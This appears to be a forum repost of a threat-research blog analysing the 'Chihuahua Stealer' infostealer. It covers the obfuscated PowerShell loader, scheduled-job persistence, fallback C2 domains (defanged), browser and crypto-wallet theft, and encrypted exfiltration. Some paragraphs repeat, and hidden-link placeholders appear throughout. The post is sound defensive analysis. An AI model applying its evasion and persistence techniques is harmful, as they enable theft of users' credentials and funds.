Analysis by Lovely Antonio and Chloe de Leon
Chihuahua Stealer is a newly discovered .NET-based infostealer that blends common malware techniques with unusually advanced features. It first came to our attention through a
, where a user shared an obfuscated PowerShell script, they were tricked into executing via a Google Drive document. If this sounds vaguely familiar: You are not wrong - we have seen similar things in a
, and we also wrote about this. The script uses multi-stage payloads, achieving persistence through scheduled tasks and leading to the execution of the main stealer payload. This blog article breaks down each stage of the attack chain, beginning with the initial delivery method and ending in encrypted data exfiltration.
Chihuahua Stealer is a newly discovered .NET-based infostealer that blends common malware techniques with unusually advanced features. It first came to our attention through a
Bu bağlantı ziyaretçiler için gizlenmiştir. Görmek için lütfen giriş yapın veya üye olun.
Bu bağlantı ziyaretçiler için gizlenmiştir. Görmek için lütfen giriş yapın veya üye olun.
Key Takeaways (tl;dr)
- The infection begins with an obfuscated PowerShell script shared through a malicious Google Drive document, launching a multi-stage payload chain.
- Persistence is achieved through a scheduled job that checks for custom marker files and dynamically fetches additional payloads from multiple fallback domains.
- The main payload, written in .NET, targets browser data and crypto wallet extensions.
- Stolen data is compressed into an archive with the file extension “.chihuahua” and encrypted using AES-GCM via Windows CNG APIs.
- The encrypted archive is exfiltrated over HTTPS, and all local traces are wiped, demonstrating its stealth techniques.
Bu bağlantı ziyaretçiler için gizlenmiştir. Görmek için lütfen giriş yapın veya üye olun.Bu bağlantı ziyaretçiler için gizlenmiştir. Görmek için lütfen giriş yapın veya üye olun.
PowerShell Script Behavior
Our colleague found an interesting post in reddit on April 9, where a user shared a PowerShell script that had tricked them into running it via a Google Drive document. Upon further examination, it turns out that the PowerShell-based loader initiates a multi-stage execution chain that uses Base64 encoding, hex-string obfuscation, and scheduled jobs to establish persistence. It will retrieve additional payloads from fallback C2 domains — indicating a modular and stealth-focused design.
The initial stage is a short launcher that executes a Base64-encoded string via PowerShell’s iex, bypassing execution policy checks and running silently. This allows the attacker to embed the actual logic in an encoded payload, delaying analysis and signature detection.
After decoding, the second-stage script reconstructs a large, obfuscated hex payload. It strips custom delimiters (i.e. “~”), converts the hex into ASCII characters, and dynamically builds the third-stage script. This runtime reconstruction technique evades static detection and sandbox analysis.
The deobfuscated script creates a scheduled job with job name “f90g30g82” that runs every minute, persistently calling a logic block. It checks the user’s Recent folder for files with the “.normaldaki” extension, used as infection markers. If a file is found, it queries a C2 server (cdn[.]findfakesnake[.]xyz) for further instructions. If the response contains a “Comm” trigger, the payload is decoded and executed. If the primary server is unreachable, the script falls back to a second domain (cat-watches-site[.]xyz).
The final stage sets the scheduled job’s trigger and retrieves a .NET assembly from flowers[.]hold-me-finger[.]xyz, followed by another Base64-encoded payload from a OneDrive-based URL. This payload, the Chihuahua Stealer, is decoded and loaded directly into memory using reflection, then executed via its Main methods. Finally, the script clears the console and wipes the contents of the clipboard.
The initial stage is a short launcher that executes a Base64-encoded string via PowerShell’s iex, bypassing execution policy checks and running silently. This allows the attacker to embed the actual logic in an encoded payload, delaying analysis and signature detection.
Bu bağlantı ziyaretçiler için gizlenmiştir. Görmek için lütfen giriş yapın veya üye olun.
After decoding, the second-stage script reconstructs a large, obfuscated hex payload. It strips custom delimiters (i.e. “~”), converts the hex into ASCII characters, and dynamically builds the third-stage script. This runtime reconstruction technique evades static detection and sandbox analysis.
The deobfuscated script creates a scheduled job with job name “f90g30g82” that runs every minute, persistently calling a logic block. It checks the user’s Recent folder for files with the “.normaldaki” extension, used as infection markers. If a file is found, it queries a C2 server (cdn[.]findfakesnake[.]xyz) for further instructions. If the response contains a “Comm” trigger, the payload is decoded and executed. If the primary server is unreachable, the script falls back to a second domain (cat-watches-site[.]xyz).
Bu bağlantı ziyaretçiler için gizlenmiştir. Görmek için lütfen giriş yapın veya üye olun.
The final stage sets the scheduled job’s trigger and retrieves a .NET assembly from flowers[.]hold-me-finger[.]xyz, followed by another Base64-encoded payload from a OneDrive-based URL. This payload, the Chihuahua Stealer, is decoded and loaded directly into memory using reflection, then executed via its Main methods. Finally, the script clears the console and wipes the contents of the clipboard.
Chihuahua Stealer
Initial Execution
Initial Execution
The stealer begins execution with DedMaxim() function, which prints transliterated Russian rap lyrics to the console with short pauses between each line. While these strings serve no functional purpose, their presence may offer a cultural or personal signature. It’s possible the malware author included these as a reference to a favorite artist or scene, similar to other themed malware that embed music, memes, or personal trademarks into their payloads.
Bu bağlantı ziyaretçiler için gizlenmiştir. Görmek için lütfen giriş yapın veya üye olun.
Bu bağlantı ziyaretçiler için gizlenmiştir. Görmek için lütfen giriş yapın veya üye olun.
Bu bağlantı ziyaretçiler için gizlenmiştir. Görmek için lütfen giriş yapın veya üye olun.
Browser and Wallet Targeting
Once the stealer finishes printing the lyrics, it moves to the core logic inside. The function PopilLina() is where the malware sets up its internal operations. The malware queries the machine name and disk serial number using WMI and combines them into a single string. The string is passed through two obfuscated helper functions that transform it into a hashed unique identifier for that specific machine. This ID is used to label the archive and folder containing stolen data.
malware,stealer,rat,hacks,hack,cheat,cheats
Bu bağlantı ziyaretçiler için gizlenmiştir. Görmek için lütfen giriş yapın veya üye olun.
malware,stealer,rat,hacks,hack,cheat,cheats